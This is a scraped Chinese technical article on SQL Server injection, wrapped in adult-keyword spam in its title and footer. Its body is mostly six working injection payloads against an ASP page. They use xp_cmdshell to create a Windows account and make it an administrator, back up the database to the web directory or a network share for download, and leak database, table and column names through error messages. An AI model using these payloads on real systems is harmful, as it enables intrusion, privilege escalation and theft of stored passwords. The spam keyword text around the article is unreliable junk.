成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

利用SQLServer系統表注入SQLServer數據庫

數據庫 SQL Server
通過SQLServer中的系統表,可以實現注入SQLServer數據庫,為注入者提供了一個跳板,為我們的項目開發帶來極大的方便。

下面為您介紹了利用SQLServer系統表注入SQLServer數據庫的實現方法,供您參考,如果您對SQLServer系統表方面感興趣的話,不妨一看。

SQLServer是一個功能強大的數據庫系統,與操作系統也有緊密的聯系,這給開發者帶來了很大的方便,但另一方面,也為注入者提供了一個跳板,我們先來看看幾個具體的例子:

① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--

分號;在SQLServer中表示隔開前后兩句語句,--表示后面的語句為注釋,所以,這句語句在SQLServer中將被分成兩句執行,先是Select出ID=1的記錄,然后執行存儲過程xp_cmdshell,這個存儲過程用于調用系統命令,于是,用net命令新建了用戶名為name、密碼為password的windows的帳號,接著:

② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--

將新建的帳號name加入管理員組,不用兩分鐘,你已經拿到了系統最高權限!當然,這種方法只適用于用sa連接數據庫的情況,否則,是沒有權限調用xp_cmdshell的。

③ http://Site/url.asp?id=1 ;;and db_name()>0

前面有個類似的例子and user>0,作用是獲取連接用戶名,db_name()是另一個系統變量,返回的是連接的數據庫名。

④ http://Site/url.asp?id=1;backup database 數據庫名 to disk=’c:\inetpub\wwwroot\1.db’;--

這是相當狠的一招,從③拿到的數據庫名,加上某些IIS出錯暴露出的絕對路徑,將數據庫備份到Web目錄下面,再用HTTP把整個數據庫就完完整整的下載回來,所有的管理員及用戶密碼都一覽無遺!在不知道絕對路徑的時候,還可以備份到網絡地址的方法(如\\202.96.xx.xx\Share\1.db),但成功率不高。

⑤ http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0

前面說過,sysobjects是SQLServer的系統表,存儲著所有的表名、視圖、約束及其它對象,xtype=’U’ and status>0,表示用戶建立的表名,上面的語句將第一個表名取出,與0比較大小,讓報錯信息把表名暴露出來。第二、第三個表名怎么獲取?還是留給我們聰明的讀者思考吧。

⑥ http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0 

從⑤拿到表名后,用object_id(‘表名’)獲取表名對應的內部ID,col_name(表名ID,1)代表該表的第1個字段名,將1換成2,3,4...就可以逐個獲取所猜解表里面的字段名。

以上6點是我研究SQLServer注入半年多以來的心血結晶,可以看出,對SQLServer的了解程度,直接影響著成功率及猜解速度。在我研究SQLServer注入之后,我在開發方面的水平也得到很大的提高,呵呵,也許安全與開發本來就是相輔相成的吧。
 

 

 

 

【編輯推薦】

sqlserver分發服務器的設置

SqlServer唯一約束的創建

讓sqlserver恢復到某個時間點

sqlserver分頁存儲過程實例

SQLServer刪除log文件和清空日志的方法

責任編輯:段燃 來源: 互聯網
相關推薦

2011-04-15 13:41:27

SqlServer數據復制

2021-04-27 07:42:35

數據庫MySQLSQLServer

2011-05-13 09:42:21

2010-09-06 11:40:06

SqlServer語句

2021-02-06 23:03:58

SQLServer數據庫變量

2011-03-17 16:51:51

SQLServer數據加速劑

2021-03-12 10:12:40

數據庫SQLServer磁盤

2010-06-17 13:16:07

SQLServer 數

2010-05-14 13:32:07

MySQL數據庫

2010-07-02 08:39:02

SQLServer數據

2010-07-15 17:50:48

SQLServer收縮

2010-09-03 13:40:24

SQL刪除

2022-07-30 07:50:40

數據庫字段存儲

2010-07-08 13:48:38

同步兩個SQLServ

2010-05-21 13:14:15

2013-04-23 09:38:39

2013-04-26 11:39:40

2010-09-30 09:11:01

2011-08-03 17:17:44

SQLServer 2SSAS

2011-05-20 14:39:28

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 综合视频在线 | 一区二区三区四区在线视频 | 日韩超碰在线 | 成人精品一区二区三区 | 中文字幕亚洲欧美日韩在线不卡 | 国产精品久久久久一区二区三区 | 国产精品一区二区三级 | 久草在线视频中文 | 久久久久久久久久久福利观看 | 精品久久久久久久久久久久久 | 国产成人99久久亚洲综合精品 | 国产成人一区二 | www.久久.com| 国产最新视频在线 | 午夜在线观看视频 | 无码一区二区三区视频 | 欧美精品中文字幕久久二区 | 做a视频在线观看 | 九九热在线免费视频 | 日韩一区二区三区视频 | 亚洲成人精品在线观看 | 精品一区二区三区四区 | 羞羞视频在线观看 | 最新国产精品视频 | 亚洲97 | 国产精久久久久久 | 亚洲最大福利网 | 国产高清自拍视频在线观看 | 欧美高清视频一区 | 国产一区二区精品在线观看 | 亚洲成人av一区二区 | 成人黄色网址大全 | www.久久 | 国产欧美精品一区二区色综合 | 影音先锋欧美资源 | 欧美成人一级 | 欧美久久一区二区三区 | 日韩一区二区三区四区五区六区 | 国产一区二区三区在线免费观看 | 91中文在线观看 | 日本特黄a级高清免费大片 国产精品久久性 |